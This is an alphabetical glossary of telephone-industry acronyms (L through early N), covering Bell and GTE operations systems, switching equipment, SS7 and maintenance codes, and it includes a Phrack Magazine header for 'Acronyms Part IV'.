LCIE Lightguide cable interconnection equipment
LCLOC Line card location
LCM Line concentrating module
LCMC Line concentrating controller module
LCN Logical channel number
LCN Logical channel numbers
LCOS Line Class of service (GTE)
LCP Language conversion program
LCP List cable pairs
LCR Least cost routing
LCR Line concentration ratio
LCRMKR Line card remarks
LCS.MIT.EDU Telecomm digest archive site on the Internet
LCS7 Link controller for signaling system No.7
LCSE Line card service and equipment
LCSEN Line card service and equipment narrative
LD Load
LD Loading division
LD Long distance
LD Voice switched trunk-service code for LATA access
LDBM Listing data base maintenance
LDES Long distance experimental schedule
LDM Logical data model
LDMTS Long distance message telecommunications service
LDN Listed directory number
LDS Local digital switch
LDSU2 Local digital service unit - model 2
LDT Local display terminal
LDU Long distance usage analysis
LE Leading edge (bsp)
LE Line equipment
LE Local exchange (contains D-CTL)
LE Voice and tone-radio landline-service code for LATA access
LEAD Loop engineering assignment data
LEAP System testing tool to simulate multiple 3270 users
LEAS Lata equal access system
LEC Local exchange carrier
LED Last entry data
LED Light emitting diode
LED Light-emitting diode
LEE Nac related line equipment transfer order establishment
LEFTS Loop electronic forecasting and tracking system
LEG Customer training file
LEIM Loop electronic inventory module
LEIM Loop electronics inventory module
LEIS Loop engineering information system (applications)
LEN Line equipment number
LENCL Line equipment number class
LENG Length
LERG Local exchange routing guide
LET Line equipment transfers
LETS Law enforcement teletypewriter service
LEV Level
LEW Line equipment transfer withdrawal
LF Data low-speed-service code for LATA access
LF Lease file
LF Line Finder
LF Line feed
LF Line finder
LF Load factor
LF Low frequency
LFACS Loop facilities assignment and control system
LFACS Loop facility assignment and control system
LFC Load factor calculation
LFR Line failure report
LFRC Local field reporting code
LG Basic data-service code for LATA access
LGC Line group controller
LGN List hunt groups
LH Line hunting (i.252 f)
LH Voice and data-psn access trunk-service code for LATA access
LI Length indicator (SS7)
LI Link interface
LIB Line interface board
LIDB Line information data base
LIDB Line information database
LIE Left in equipment
LIFECOST Life cycle cost system
LIFO Last in
LIJ Left In Jumper
LIM Less than the specified number of pairs
LIN Line
LIN Transmit alit data to COSMOS
LINCS Lan integrated network communications system
LINIS Line and number inventory system
LINK Loop interface network
LINK1 The basic rate interface transmission extension (BRITE) link one is down
LINK2 The BRITE link two is down.
LINK3 The BRITE link three is down.
LINK4 The BRITE link four is down.
LINK5 The BRITE link five is down.
LINK6 The BRITE link six is down.
LIS Library information system
LIST Listen
LIT Line insulation test
LIT Line insulation testing parameters
LIU Lats interface unit
LIU Line interface unit
LIU Line user interface
LJ Voice and data ssn access-service code for LATA access
LK Voice and data-ssn-intermachine trunk-service code for LATA access
LKNODE Link node
LL Logical link
LL Long distance terminal line INTER/TRA blocal 1-26
LL Long lines
LLC Line load control
LLC Low level controller sipx6100
LLD Low level device drivers (IOS)
LLDB Location life data base
LLF Line link frame
LLID Ll identifier
LLL Last look logic
LLN Line link network
LLN Line link network (ess)
LLP Link layer protocol (lapd)
LLS Local Line Switch (GTE)
LME Line module equipment
LMMS Local message metering system
LMOS Loop maintenance operations system
LMOS F/E Loop maintenance operations system front end
LMOS HOST Loop maintenance operations system host
LMOS I/F Loop maintenance operating system interface
LMS Litigation management system
LMS Loop maintenance system
LMS/TUM Local measuring system/temporary usage measurement
LMT Local maintenance operations system
LMTS Limits
LMU Line multiplexer unit
LMX L-multiplex
LN Data extension
LN Leased network
LN Loop normal (on-hook normal)
LNA Line and number administration
LNA Low noise amplifier
LNBAS Call failed due to the query being blocked at the switch
LNBN Call failed due to the query being blocked in the CCS network
LNG Longitudinal
LNS Line number status
LO Low threshold
LOA Limit operator attempts
LOAD Listing of acronym definition
LOC Local
LOC Local operating company
LOC Location of cable on frame
LOCAP Low capacitance
LOCN Location
LOE List originating line equipment
LOE Location operating entity
LOES Lajms online entry system
LOF Lock off-line
LOF Loss of frame
LOGIC Logistics integrated control system
LOGU Logical units assignments
LOMS Loop assignment center operations management system
LON Lock on-line
LONALS Local off-net access lines
LP Telephoto/facsimile-service code for LATA access
LPA Link pack area
LPBK Looped back
LPCDF Low profile combined distributing frame
LPCDF Low profile conventional distributing frame
LPIE Loop plant improvement evaluator
LPIE2 Loop plant improvement evaluator 2
LPK Line concentrating equipment line packs
LPM Lines per minute
LPM Logistic planning module
LPS Log/print status
LPT Loop test
LQ Voice grade customized-service code for LATA access
LR Loop reverse (off-hook normal)
LR Protection relay-voice grade-service code for LATA access
LRAP Long route analysis program
LRC Longitudinal redundancy check
LRIA1 Long run incremental analysis i
LRISP Long range information systems planning organization
LRM Line resource monitor-ims (BMC)
LRN Local reference number
LROPP Long-range outside plant planning
LROT OR LRH Local rotary
LRP Long range planning
LRS Lease record system
LRS Line repeater station
LRSS Long range switching studies
LS Local service INTER/TRA blocal 1-26
LS Loop start signaling
LS&E Local service and equipment
LSA Local security administrator
LSA Local subaccount
LSB Lower side band
LSBS Location specific bypass system
LSD&F Local switching demand & facility data base system
LSDB Listing service data base
LSDF Local switching demand and facility data base system
LSDN Local switched digital network
LSE Line and station transfer order establishment
LSEC Loss of sec (C/I channel code)
LSHF Message LAN shelf
LSI Large-scale integrated circuitry
LSL Loss of signal level (C/I channel code)
LSM Load synchronization mechanization
LSM Local switching module
LSN Logical session number
LSO Local service office
LSO Local storage option-ims (IBM)
LSRP Local switching replacement planning
LSRP Local switching replacement planning system
LSS Lata switching systems
LSS Listing service system
LSS Listing services system
LSS Loop switching system
LSSGR Lata switching systems generic requirements
LSSI Local special service inventory
LSSR Local special service results
LSSU Link state signal unit (SS7)
LSSU Link status signal unit
LST Line and station transfer
LSU Line switch unit
LSU Local storage unit
LSU Loss of signal level of u interface (C/I channel code)
LSUE Lsu error condition (C/I channel code)
LSV Latch switch verification
LSV Line status verifier
LSW Line and station transfer withdrawal
LT Lata tandem
LT Line termination
LT Local terminal
LT Long distance terminal trunk INTER/TRA blocal 1-26
LT-S Lt on s bus
LT-T Lt on t interface
LTAB Line test access bus
LTB Last trunk busy
LTC Line trunk controller
LTC Local test cabinet
LTD Local test desk
LTD Local test desk (#16
LTD Long term disability
LTD Lt disable (C/I channel code)
LTERM Logical terminal-ims (IBM)
LTF Light terminal frame
LTF Lightwave terminal frame
LTF Lightwave terminating frame
LTF Line trunk frame
LTG Line translation group
LTG Line trunk group
LTI Loop termination identifier
LTMA Lightwave terminal multiplex assembly
LTMA Lightwave terminating multiplexing assembly
LTN List telephone numbers
LTOP Long term disability plan
LTP Line and trunk peripherals
LTP Local test port
LTP Loop technology planning
LTS Loss test set
LTU Line trunk unit
LTUC Ltu control
LU Line unit
LU 6.2 Protocol for appc
LU2 Line unit model 2
LUA Link up america tracking
LUCHBD Line unit channel board
LUCOMC Line unit common control
LUHLSC Line unit high level service circuit
LUIF Living unit interface file
LUM Line utilization monitor-ims (BMC)
LUPEX Line unit path exerciser
LURR Large user reproduced records system
LV Sdlv
LVL1ERR Level 1 protocol error.
LVL2ERR Level 2 protocol error.
LVL3ERR Level 3 protocol error.
LVM Line verification module
LW-SSS Lightwave system support services by weco
LWC Leave word calling
LX 2 Local originating
LX 2 Local terminating
LXE Lightguide express entry
LZ Dedicated facility-service code for LATA access
M Latest date that this ticket can be loaded.
M M(transmit) signal lead
M Maintenance
M Minutes
M LETTER Methods letter
M O Master office
M S Main station
M S Mark sense
M&P Methods and procedures
M-MONEY Maintenance money
M-STARS Measurement and statistics tracking and reporting system
M/ATR Maritime/aviation tracking reports
M/W Microwave
M5 Five-minute
MA Cellular access trunk 2-way INTER/TRA blocal 1-26
MA Maintenance administrator
MA Multiple access (primary)
MA02 Status requested
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system - 1AESS maintenance
MA05 Maintenance interrupt count for last hour - 1AESS maintenance
MA06 Scanners
MA07 Successful switch of duplicated unit (program store etc.) - 1AESS
MA08 Excessive error rate of named unit -1AESS maintenance
MA09 Power should not be removed from named unit - 1AESS maintenance
MA10 Ok to remove paper - 1AESS maintenance
MA11 Power manually removed from unit - 1AESS maintenance
MA12 Power restored to unit - 1AESS maintenance
MA13 Indicates central control active - 1AESS maintenance
MA15 Hourly report of # of times interrupt recovery program acted - ma
MA17 Centrex data link power removed - 1AESS maintenance
MA21 Reports action taken on mac-rex command -1AESS maintenance msg
MA23 4 minute report- emergency action phase triggers are inhibited
MAB Metallic access bus
MAC Machine administration center
MAC Major accounting center
MAC Mechanized assignment control (BTL)
MAC Missed appointment code
MAC Monitor analysis & control of fa standard values
MACBS Multi-access cable billing system
MACS Major apparatus and cable system
MACS Mechanized analysis of customer systems
MACS(DS) Major apparatus control system (dist. svcs)
MADN Multiple access directory numbers
MADPE Address parity error
MAEC Media access error counter
MAI Multiple access interface (univac)
MAILLOG Manager electronic mail logging system
MAINT Maintenance
MAINT Maintenance handler
MAL Maintenance action limits
MAL Manual assignment list
MALRU Mechanized automatic line record update
MALT Maintenance transmission action limit table
MAMA Mechanized automatic message accounting
MAMA Mobile automatic message accounting
MAN Manual
MAN Metropolitan area network
MAN Miscellaneous account number
MAP Maintenance and administration position
MAP Maintenance and administrative position (NTI)
MAP Management assessment program
MAP Manual assignment parameters
MAP Manufacturing automation protocol
MAP Mobile application part
MAPCI Map command interpreter (NTI)
MAPPER Maintain and prepare executive reports
MAPS Mechanized accounts payable system
MAPS Modeling and planning system (BTL)
MAPSS Maintenance & analysis plan for special services
MAPSS Maintenance and analysis plan for special services
MAQ Manual assignment file inquiry
MAR Market analysis report (BTL)
MAR Microprogram address register
MAR Multi-alternate route
MARC Market analysis of revenue and customers system
MARC Market analysis of revenues and customers
MARC/CAPS Market analysis of personnel and customer analysis profile
MARCH A computer system
MARG Margin Parameter
MARK Mechanized Assignment Record Keeping System (GTE COSMOS)
MARK IV General purpose information storage and retrieval system
MARS Mechanized automative repair system
MARS Multiple access repair system
MAS Interfacesmessage analysis sampling plan
MAS Main store
MAS Mass announcement system (900 service)
MAS Memory administration system
MASB Mas bus
MASC Mas controller
MASM Mas memory
MAST Mail analysis and sales tracking
MAT Manual assistance tag
MAT Metropolitan area trunk
MATFAP Metropolitan area transmission facility analysis program
MATR Maritime/aviation tracking system
MATR Modified answering time recorder
MATS Marketing access tracking system
MATS Mechanized analysis of traffic studies system
MAVIS McDonnell Douglas automatic voice information system (model 1018t)
MAX Maximum
MAX Maximum messages
MAX Maximum percentage value of entity fill or maximum ccs value
MAXS Metallic automatic cross-connected system
MAY Modify an assembly
MB Make busy
MB Make-busy or made-busy
MB/S Megabits per second.
MBO Management by objectives
MBP Metallic bypass pair
MBPS Megabits per second
MBX Measured branch exchange
MBYTE Megabyte
MC Machine congestion
MC Maintenance connector
MC Maintenance center
MC Maintenance circuit
MC Marker class of service
MC Memory controller
MCA Misrouted centralized automatic message accounting (MDII)
MCAS Material cable administrative system
MCB Message control bank (sperry)
MCC Maintenance control center
MCC Manual camera control
MCC Master control center
MCC Minicluster controller
MCCI Mechanized customer contact index
MCCRAP Master control center trouble report analysis plan
MCCS Mechanized calling card service
MCE Establish a maintenance change ticket
MCH Maintenance channel
MCH Manually change hunt
MCHB Maintenance channel buffer
MCI Malicious call identification (i.251 g)
MCI Microwave communications incorporated
MCIAS Multi-channel intelligent announcement system
MCIAS Multi-channel intercept announcement system
MCINT Mate control interrupt
MCL Maintenance change list
MCN Machine congestion level # where MCI=machine congestion level
MCN Master control number
MCN Metropolitan campus network
MCOS Multiplexer out of synchronization
MCP Mechanized credit provisioning system
MCR Establish a maintenance change repair
MCR Mass call register
MCS Master cpu subsystem
MCS Meeting communications service
MCS Multiple console support
MCTAP Mechanized cable transfer administration plan
MCTRAP Mechanized customer trouble report analysis plan
MCTSI Module controller/time slot interchange
MCTSI Module controller/time-slot interchange unit
MCW Maintenance change ticket withdrawal
MD SS7fe message distributor
MD/RS Mechanized denial/restoral system
MDACS Modular digital access control system
MDC Manually disconnect a working circuit
MDC Marker distributor control
MDC Materials distribution center
MDC Meridian digital centrex
MDCMES Management development center mechanized enrollment system
MDF Main distributing frame
MDF Main distribution frame
MDII Machine detected interoffice irregularities
MDII Machine-detected interoffice irregularity
MDIS Marketing data interface system
MDLIE DLI interface error
MDOG Mechanized disbursement of gasoline
MDP SS7 fe message distribution protocol
MDR Mechanized draft reconciliation
MDR Message detail record
MDS Message design systems
MDT Management development/training
MDU Marker decoder unit
MDX Modular digital exchange
ME Management employment
ME & ASSM Management employment & assessment
ME CORP Corporation management employment
MEANS Model for economic analysis of network service
MEAS Measure
MEASMT Measurement
MEC Maintenance engineer center
MEC Manually establish a circuit
MEC Mobile equipment console
MECA Mechanization of engineering & circuit provisioning
MECAB Multi exchange carrier access billing
MECCRRF Mechanized credit reference system
MECH More efficient call handling
MECOD Multiple exchange carrier ordering and design
MED Medium threshold
MED Multipoint end-link data
MEDPLUS Medicare part b reimbursement payments
MEDS Mechanized expense distribution system
MEF Master employee file
MELD Mechanized engineering and layout for distributing frames
MEP Medical expense plan
MERITS Measurement of exchange records integrity through sampling
MERP Mechanization of estimate results plan
MERS Most economic route selection
MERT Master employee record tape
MESA Mechanized edits of street address
MESS Message
MET Multibutton electronic telephone
METASX Metallic access
MF Mainboard firmware (IOS)
MF Multi frame
MF Multi frequency
MF Multifrequency
MF Multiplexer frame
MFAS Mechanized forecasting and analysis system
MFC Master file directory (VMS-catalog of UFDS)
MFC Modular feature construction
MFC Multiple frame operation control (IOS)
MFENET Magnetic fusion energy network
MFFAN Miscellaneous frame (CM2 offices only)
MFJ Modification of final judgement
MFJ Modification of final judgment
MFJ Modified final judgment (consent decree)
MFR Discmanufacture discontinued
MFR Mechanized force report
MFR Multi-frequency receivers
MFRS Management force reporting system
MFS Message formatting service-ims (IBM)
MFT Metallic facility terminal
MFT Multiprogramming with a fixed number of tasks
MG Marker group
MG Marker group number
MG Mastergroup
MGB Main ground bus
MGB Master ground bar
MGBAF Maintenance group blocking acknowledgment failure
MGR Manager
MGSC Message service customer counts
MGSG Message service multi-line hunt
MGT Mastergroup translator
MGUAF Maintenance group unblocking acknowledgment failure
MH Modified huffman code (fax)
MHD Moving head disk
MHD Moving head disk drive(s) used in the am.
MHDC Moving head disk control
MHDDC Moving head disk data/clock
MHS Message handling service
MHS Message handling system
MHZ Megahertz
MI Machine interface
MI Message interface on the
MI Swbt minimal input
MIAS Marketing information analysis system
MICA Mechanized intercompany contract administration
MICC Minicluster controller
MICE Modular integrated communications environment
MICI Mechanized independent company input
MICR Minimal input customer records
MICRO/TEL Micro/tel force analyzer
MICS BTL maintenance space inventory control system
MICU Message interface and clock unit
MICU Message interface clock unit
MID Master interim design
MIFM Mechanized installation force management
MIG Mechanized interval guide system
MIIS Management inventory information system
MIMIC Mts-wats intrastate model for incremental cost
MIN Minimum
MIN Minimum percentage value of entity fill or minimum CCS value
MIN Mobile identification number
MINX Multimedia information network exchange
MIOIO I/O invalid operation error
MIOLE I/O lock error
MIOPE I/O bus parity error
MIOTO I/O timer time out error
MIOUE I/O unlock error
MIP Microprocessor interface port
MIPP Management surplus income protection plan
MIPS Million instructions per second
MIR Micro-instruction register
MIRA Maintenance input request administrator
MIRA Mark iv information retrieval aid
MIS Management information system
MIS Mechanized intercepting system
MIS/C Management information system/computer
MISC Miscellaneous
MISCF Miscellaneous frame
MISS Management information staffing system
MITS Microcomputer interactive test system
MIU Metallic interface unit
MIZAR Management job evaluation
MJEC Multiple job function codes
MJF Modified final judgement
MJU Multipoint junction unit
MKBUSY Make busy.
MKR Marker
MKTG Marketing
ML Matching loss
MLAC Manual loop assignment center
MLC Miniline card
MLC Monitor level code
MLCD Multi-line call detail
MLH Multiline hunt
MLHG Multi-line hunt group
MLHG Multiline hunt group
MLI Message link interface
MLIIBLNG Microlink II billing
MLNC Failure to match and no circuit
MLPA Modifiable link pack area (IBM)
MLSS Machine load service summary
MLT Mechanized loop test
MLT Mechanized loop testing system
MLT-1 Mechanized loop testing system-1
MLT-2 Mechanized loop testing - the second generation of equipment
MLT-2 Mechanized loop testing system-2
MMA Multi-module access unit (Univac)
MMC Manually modify a circuit
MMC Minicomputer maintenance center
MMEME Memory system error
MMG Minicomputer maintenance group
MMGT Multimastergroup translator
MMI Man-machine interface
MML Man machine language
MMM Message mile minute
MMOC Minicomputer maintenance operation center
MMOC Minicomputer maintenance operations center
MMOCS Minicomputer maintenance and operations center system
MMP Module message processor
MMPP Mechanized market programming procedures (BTL)
MMRCS Minicomputer maintenance and repair center system
MMS Main memory status
MMS Memory management system
MMS/SSII Marketing measurement system/support system II
MMS43 Modified monitoring state 43 code
MMSU Modular metallic service unit
MMT Multiple message threshold
MMU Memory management unit (IOS)
MMX Mastergroup multiplex
MN02 List of circuits in trouble in memory
MNP Microcom networking protocol
MOC Machine operations center
MOC Maintenance and operations console
MOC Maintenance operation console
MOC Ministry of communication
MOC Moe order completion
MOD Ministry of defense
MOD Modifier
MOD Modulated
MOD Module number
MOD1 Miscellaneous per SM measurements (MOD1)
MODCOES Modified central office cost
MODEM Modulator-demodulator
MOE Mass oe transfers
MOF Mass oe frame transfer listings
MOG Minicomputer operations group
MOI Maintenance and operation interface
MOI Mizar order inquiry
MOMS Missouri marketing system
MON Monitor
MON Monitor channel (i.e. IOM2)
MON Mouth
MOOSA Mechanized out of service adjustment system
MOOSE Macs online organization system entry (distribution services)
MOS Maintenance and operations subsystem
MOS Metal oxide semiconductor
MOSOP Mechanized operator services occupational payroll
MOST Managing operations systems in transition
MOSTED Motor vehicle/special tools expense distribution
MOT&R Master office test and release circuit
MOTS Mechanized operations tracking system
MOU Minutes of use
MOU-AS The annual study module of DRP/MOU
MOU-DA The data accumulation module of DRP/MOU
MOVE Move remote line Concentrating module
MOW Moe order withdrawal
MP Maintenance position
MP Message processing program
MP Microprocessor
MP Multi-processor
MPAP Management potential appraisal plan
MPC Marker pulse conversion
MPC Messages per customer
MPC Mp command
MPCG Message processing clerical guide
MPCH Main parallel channel
MPDB-OS Outside plant-pair gain
MPDBCOAR MPDB-central office equipment and repair services
MPDBSRVC Office supplies computers and other services
MPDU Message protocol data units (x.411)
MPES Message processing entry system
MPFRS Mechanized project force requirement system
MPI Mechanized project impact system
MPK Modify work package
MPLR Mechanized plant location records system
MPLUM Mechanized plant utilization management
MPN Master work package number
MPOOS Modem pool line out of service.
MPOW Multiple purpose operator workstation
MPPD Multi-purpose peripheral device
MPRIN Mate peripheral interrupt
MPS Mechanized pension system
MPS Misplaced start pulse
MPS Misplaced start pulse (MDII)
MPT Message transfer part
MPTS Market planning and tracking system
MQ Metallic customized-service code for LATA access
MQH Marker queue high
MQL Marker queue low
MR Maintenance request (BTL)
MR Measured rate
MR Message rate (BSP)
MR Message register
MR Message register COSMOS command
MR Modified read (relative element address designate
MR Monitor read (flow control bit in IOM2)
MR/IBPS Management report/integrated budget and planning system
MRAA Meter reading access arrangement
MRCS Modification request control system
MRDB Memory resident data base
MRDYT Ready time out
MRF Maintenance reset function
MRF Message refusal received (outgoing)
MRF Message retention file
MRFA Mechanized repair force administration
MRFF Master reference frequency frame
MRFIS Mechanized request for information systems
MRO Message register option
MRP Mechanized revenue planning system
MRPS Mobile radio priority system
MRR Mandatory review reporting
MRS Management reporting system (TNDS)
MRSELS Microwave radio & satellite eng. & lic
MRTI Message-rate treatment index (AMA NTI)
MRTS Mechanized real time tracking system
MRTTA Message recording trunk trouble analysis
MRWPE Read or write parity error
MS Machine screw (BSP)
MS Maintenance state
MS Measured service
MS Mechanized scheduling
MS Memory subsystem
MS Menu software (sipb.exe)
MS Microseconds
MS6E Message switching #6 equipment
MS7E Message switching #7 equipment
MSA Management science america
MSAG Master street address guide
MSC Media stimulated calling
MSC Minimum service charge
MSCP Mass storage control protocol
MSCS Management scheduling and control system
MSCU Message switch control unit
MSCU Message switch controller unit
MSDS Material safety data sheet system
MSFDB Market share forecast data base
MSGBUF Message buffer
MSGCLS Message class
MSGLOCK Message lock
MSGNO Message number
MSGP Microcomputer support group programming
MSGS Message switch
MSK Output a transaction mask
MSKMR Mate reset
MSM Multi-state marketing system
MSMTCH Mismatch.
MSN Multiple subscriber number (i.251 b)
MSORS Mechanized sales office record system (BTL)
MSP Management salary plan
MSP Metropolitan service plan
MSPR Message switch peripheral unit
MSR Marketing surveys and reports
MSR Mechanized sales results system (mbt directory sales)
MSR Mechanized service record
MSR Mizar status report
MSR/DIS Mechanized service record/disability subsystem
MSS Mass storage system
MSS Mss is a dialup for... database of 1800 numbers...
MSSS Mechanized supply stock system
MSTIC Mechanized standard time increments (we/eplans)
MSTS Measured service tracking system
MSU Message signal unit
MSU Metallic service unit
MSU Msg. signal unit (SS7)
MSUCOM Metallic service unit common
MSUS Measured service usage studies
MSUSM Subunit select mismatch
MT Master record tape unit number or tape drive to write
MT Wired music INTER/TRA blocal 1-26
MTA Message transfer agent (x.400)
MTAE Message transfer agent entity (x.400)
MTB Magnetic tape billing
MTB Metallic test bus
MTC Facs maintenance transaction
MTCE Maintenance (default).
MTCE Maintenance parameters
MTD Magnetic tape drive
MTD Mutilated digit
MTD Mutilated digit (MDII)
MTECS Iimechanized toll error correction system phase ii
MTECS Mechanized toll error correction system
MTEL Main telephone
MTF Master test frame
MTH Magnetic tape handler
MTIB Metallic test interconnect bus
MTIBAX Metallic test interconnect bus access
MTINT Miscellaneous timer interrupt
MTL Maximum termination liability
MTLR Mechanized trouble log report
MTLT Maintenance transmission action limit table
MTM Maintenance trunk module (NTI)
MTO Master terminal operator
MTP Management transitional program
MTP Message transfer part (SS7: q.701-q.710)
MTP Message transfer part.
MTP Message transfer protocol (x.411: p1)
MTR Manually test a response
MTR Mechanized time reporting
MTR Tape drive to read
MTRS Marketing or management time reporting system
MTRS Mechanized training records system
MTRS/FCC Management time reporting system/fcc report
MTRT Mate ready time out
MTS Manual test system
MTS Memory time switch peb2040
MTS Message telecommunications service
MTS Message telecommunications system
MTS Message telephone service
MTS Message teleprocessing system
MTS Message toll service
MTS Mobile telephone service
MTSC MTS CMOS (512 incoming channels)
MTSDB Message telecommunications services data base
MTSI Msg telecommunications ser price index
MTSL MTS large (1024 incoming channels)
MTSO Mobile telephone switching office
MTSS MTS small (256 incoming channels)
MTTP Master trunk test panel
MTU Magnetic tape unit parameters
MTU Maintenance termination unit
MTU Media tech unit
MTW Tape drive to write
MTX Mobile telephone exchange
MU Maintenance usage
MU Message unit
MUC Material usage code
MULDEM Multiplexer-demultiplexer
MULT Multiple
MUM Measured unit message
MUNICH Multichannel (32) network interface controller
MUPH Multiple position hunt
MUSAC Multipoint switching and conferencing unit
MUSIC Modeling for usage sensitive incremental costs
MUT Miniaturized universal trunk frame
MUT Multi-unit-test
MUX Multiplex
MUX Multiplexer
MVAS Motor vehicle accident summary
MVCCW Commstar ii call waiting USOC
MVP Multiline variety package
MVS Multiple virtual storage
MVS Multiple virtual storage operating
MVS/MODS TSO display operator messages from programs running under
MVS/SP Multiple virtual storages/system product operating system
MVS/SPA Multiple virtual storages/system product assist operating
MVS/XA Multiple virtual storage/extended architecture
MVT Multiprogramming with a variable number of tasks
MVTC Motor vehicle type code
MW (ger) service word
MW Mandatory work
MW Multiwink
MWCP Mechanized wire centering program (BTL)
MWI Message waiting indicator
MWPER Write protect error
MX Monitor transmit (flow control bit in IOM2)
MXU Multiplex units
MXU Multiplexer unit

==Phrack Magazine==
Volume Four, Issue Forty-Three, File 24 of 27
{Acronyms Part IV}

N Estimated time to complete this ticket.
N No corrective action
N(R) (NR) receive sequence number
N(S) (NS) transmit sequence number
NA CSACC link (EPSCS) INTER/TRA blocal 1-26
NA Next address
NA Normal alignment
NAAP New affirmative action program
NAB Network analysis bureau
NAC Network administration center
NAC Network application center
NAC Non-area code
NACK No ground acknowledgment received on a ground start private facility (FX) trunk
NAFMAP Network administration force management and productivity
NAG Network architecture group
NAI Telephone number assignment inquiry
NAK Negative acknowledge
NAM Number assignment module
NAND Not-and gate
NANP North american numbering plan
NAP Network access pricing
NAP Network analysis program (BTL)
NAR Nac assignment review
NARS National yellow pages services accounts receivable system
NAS Network analysis system
NAS Numerical and atmospheric sciences network
NAS/CARS Network analysis system/central analysis report system
NAS/SRS Network analysis system/subscriber recording system (MBT)
NASS Network administration support system
NATL National code (NTI)
NAUG Network administration user group
NB Narrow band
NBSY Number of busy (trunks) (NTI)
NC CNCC link (SPSCS) INTER/TRA blocal 1-26
NC Network channel
NC No circuit
NCA No circuit announcement
NCAT Network cost analysis tool
NCC National coordinating center (national emergency)
NCC Network control center
NCC Notify corrupted CRC (in EOC)
NCCF Network communication control facility (IBM vtam/mcp option)
NCCF Network communications control facility
NCD Network call denial
NCDAFTA NCD denied after answer
NCDAFTA Network call denial (NCD) denied after answer
NCDBEFA NCD denied before answer
NCDBLKD NCD returned blocked
NCDCCBL NCD code control blocked
NCDDBOV NCD data base overload
NCDDBOV NCD database overload
NCDDENY NCD deny received
NCDDSBL NCD direct signaling blocked
NCDNOXL NCD returned no translation
NCDOVLD NCD returned overload
NCDUNEQ NCD returned unequipped
NCH Noch
NCI Network channel interface
NCI No card issue
NCLK Network clock
NCLS Non-capitalized lease system
NCMASTER No circuit master
NCOO Network central office operations
NCOS Dms 100 class of service
NCOSC Network clock 2 oscillator
NCOSS Network communication and operations support system
NCP National control point
NCP Network control point
NCP Network control point (in a SDN)
NCP Network control program (IBM3725 software)
NCR- Sclrnetwork completion report-system called line report system
NCRPAB Network cost results plan
NCS National communications system
NCSPC Non-conforming stored program control
NCT Network control and timing
NCT (CP) Network control and timing call processing
NCT LINKS Network control and timing links
NCTE Digital network channel equipment
NCTE Network channel terminating equipment
NCTE Network channel terminating equipment (FCC NT1)
NCTLNK Network control and timing link
NCU Network control unit
ND Network data line INTER/TRA blocal 1-26
NDA Network data analyzer
NDA Network delivery access
NDBS Network data base system
NDC National destination code (i.e. area code)
NDC Network data collection
NDC Node data collection
NDCC Network data collection center
NDIS National dial-it services
NDPCC Network data processing coordination center
NDRAS Network distribution resource administration system
NDS Network data system
NDS Network distribution services
NDS-TIDE Network data system-traffic information distributor and
NDS/ANN Announcement system - System/36
NDS/BMR Bmrbudget morning report - System 36
NDS/CONAD Conadcontract administration system - System 36
NDS/FLEXNDS Flexible reporting
NDS/FORMS Mechanized forms - System 36
NDS/MT Mechanized tool interface - System 36
NDS/PDB Personnel database - System 36
NDU Network data unit
NE Near end
NE Network element
NE Network elements
NEAS Non-optional extended area service
NEBE Near end block error (IOM2 monitor message)
NEBS Network equipment-building system
NEBS New equipment-building system
NECA National exchange carrier association
NECC National emergency coordination center (bellcore)
NEG Negative
NEON Nonmanagement employee opportunity network
NERC National emergency relocation center
NESAC National electronic switching assistance center
NESC National electric safety code
NET (ec) european standards of telecommunication
NETPARS Network performance analysis reporting system (IBM Vtam)
NETPRT Netprt
NETS Nationwide emergency telecommunications system
NETTIMS Nettims
NETWORK Sidethe segment of the time slot interchanger (TSI) that is
NEXT Near end cross (x) talk
NEXT Near end crosstalk
NEXT Node exhaust tool system
NFID Non-fielded id
NFM Network force management
NFS Network file system
NFT Network file transfer
NG No good
NGF Number group frame
NGF Number group frame for 5 Cross Bar
NHLS Next higher level support
NHR Non hierarchical routing
NHR Not hard to reach
NI Network interface
NI/NC Network interface/network channel
NID Network in dialing
NID Network information database
NIP Nucleus initialization program
NIPA Net income and productivity analysis
NIRS National yellow pages services invoice receiving system
NIS Operation system-intelligent network elements
NIS(FLEXCOM) Network interface system - OPS/INE
NKP No key pulse
NKP No key pulse (MDII)
NL-PG Line number page
NLD Nonlinear distortion
NLD-SN Nonlinear distortion signal/noise
NLDM Network logical data manager (IBM VTAM option)
NLP Network layer protocol
NM Network maintenance
NM Network management
NM Network management.
NM Network module
NMA Network management applique
NMA Network monitoring and analysis
NMAT Nonmanagement attendance tracking system
NMB Network management busy (NTI)
NMC Network management center
NMC Network module controller (NTI)
NMDT Network management display terminal (AT&T)
NMMPEN Network maintenance management planning
NMOS Network management operations support
NMPR Network management printer (AT&T)
NMS Network management services
NMS Network management system
NN Two digit number
NNN Three digit number
NNNN Four digit number
NNX Central office code designating the customer exchange
NNX Network numbering exchange
NNX Telephone exchange code
NO Number
NOC National operations center at Bedminster N.J.
NOC Network operations center
NOC Normalized office code
NOCS Network operations center system
NOD Network out dialing
NODAL Network operations forum
NOE Number of oes to be assigned
NOL Nac service order listing
NOMAD No-op instruction
NOPS Network operations plan system
NOR/TADS North region/testing and development system
NORAD North american air defense command
NORGEN Network operation report generating
NORGEN Network operations report generator
NORGEN Network operations report generator system
NORM Normal
NORM Return to normal (IOM2 monitor command/message)
NOS Network operating system
NOTIS Network operations trouble information system
NOW Network optical warehouse
NP Non-published
NPA Area code and exchange number
NPA Network performance analyzer (IBM)
NPA No power alarm
NPA Numbering plan area (area code)
NPAP Nonmanagement performance appraisal plan
NPC Network processor circuit
NPC No parameter choices
NPDA Network problem determination applicator (IBM)
NPH Network protocol handler
NPM Network performance monitoring system
NPS Network planning system
NPSI Ncp packet switching interface
NPUMP Normal pump
NPV Net present value
NQ Telegraph customized-service code for LATA access
NR No response.
NRAS Nova/rider awards system
NRC Non-recurring charge
NRG Number of rings
NRM Normal response mode (hscx)
NRM Normalizing ccs value
NRODD Non-redundant ODD
NRRI National regulatory research institute data
NRRT Non-reroutable traffic
NRS Network routing system (MBT)
NRT No response while in test mode.
NRZ Non return to zero
NRZC Nrz change
NRZI Nrz inverted
NRZM Nrz mark
NSA National security agency
NSAC Network service administration center
NSACGCOMP NS SCP ACG component
NSBADRESP NS SCP response message with invalid data
NSC Network service center
NSCMP Network service center multi (dddcservice bureau)
NSCS Network service center system
NSD No start dial
NSD Number summary display
NSDB/IA Network and service data base/interface administration
NSE Network switching engineering
NSE Noise
NSEC Network switching engineering center
NSEP National security emergency preparedness
NSFNET National science foundation network
NSN Network services node
NSNONRTEMSG NS reject message
NSP Network service part (SS7: SCCP+MTP)
NSP Non sent paid (coin)
NSPEC Node spec file
